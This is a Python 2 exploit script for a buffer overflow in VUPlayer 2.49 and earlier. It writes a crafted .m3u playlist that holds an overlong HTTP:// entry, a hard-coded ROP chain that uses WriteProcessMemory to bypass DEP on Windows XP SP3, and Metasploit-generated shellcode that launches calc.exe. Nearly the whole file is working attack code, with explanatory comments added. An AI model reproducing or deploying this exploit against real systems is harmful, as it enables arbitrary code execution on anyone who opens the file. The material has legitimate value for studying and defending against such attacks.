#!/usr/bin/env python
#
# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Author: mr_me
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 /noexecute=alwayson
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# DEP AlwaysOn bypass version
# Thanks to Sud0 & Lincoln, for the motivation to learn this :-)
#
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
# Payload bytes generated by Metasploit (see header: EXITFUNC=process, CMD=calc.exe).
# This is Python 2 code throughout: `print` is a statement and `str` literals are
# raw byte strings, so each "\xNN" escape below is written to disk as one byte.
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
# Playlist entry: the "HTTP://" prefix followed by 1005 filler bytes ('A').  An
# over-long single entry of this shape is the trigger named in the header, and it
# is also the most recognisable artifact when scanning .m3u files for this issue.
crash = "HTTP://" + "\x41" * 1005
# ROP chain.  Every address below is a fixed, hard-coded module address taken from
# the test environment in the header (XP SP3; the kernel32 / shell32 / app-dll
# builds present there).  Per-gadget comments are the author's; the chain only
# lines up when those modules load at exactly these addresses, which is why
# address randomisation (ASLR) on later Windows versions breaks chains of this kind.
rop = "\xd3\x72\x60\x10" # POPAD # JE SHORT BASSMIDI.10607337 : 0x106072D3
rop += "\x2f\x10\x60\x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN : 0x1060102F
rop += "\x13\x22\x80\x7c" # @ of WriteProcessMemory() : 0x7C802213
rop += "\xcf\x22\x80\x7c" # Address to be patched in kernel32 : 0x7C8022CF
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\xff\xff\xff\xff" # start @ -1 for shellcode size : 0xffffffff
rop += "\x15\x10\x10\x10" # This @ from .data segment of app dll : 0x10101015
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x44\x44\x44\x44" # JUNK : 0x44444444
rop += "\x79\x21\x60\x10" # POP EDI # POP ESI # RETN : 0x10602179
rop += "\x88\x71\x60\x10" # CALL EAX : 0x10607188
rop += "\xff\xff\xff\xff" # -hProcess argv[1] : 0xffffffff
# Get the length of shellcode - @ from kernel32
rop += "\x6f\x10\x81\x7c" * 305 # INC EBX # RETN : 0x7C81106F
# push all args on the stack for WPM() - @ from shell32.dll
rop += "\xf9\x18\xa1\x7c" # PUSHAD # RETN : 0x7CA118F9
# Final file layout: filler entry, then the ROP chain, then the payload bytes.
buffer = crash + rop + sc
print "[+] Building .m3u file"
# Writes the crafted playlist as cst-vuplayer.m3u in the current working directory
# (the only side effect of this script).  `file` shadows the Python 2 builtin of
# the same name, and the trailing semicolons are redundant in Python.
file = open('cst-vuplayer.m3u','w');
file.write(buffer);
file.close();
print "[+] Done"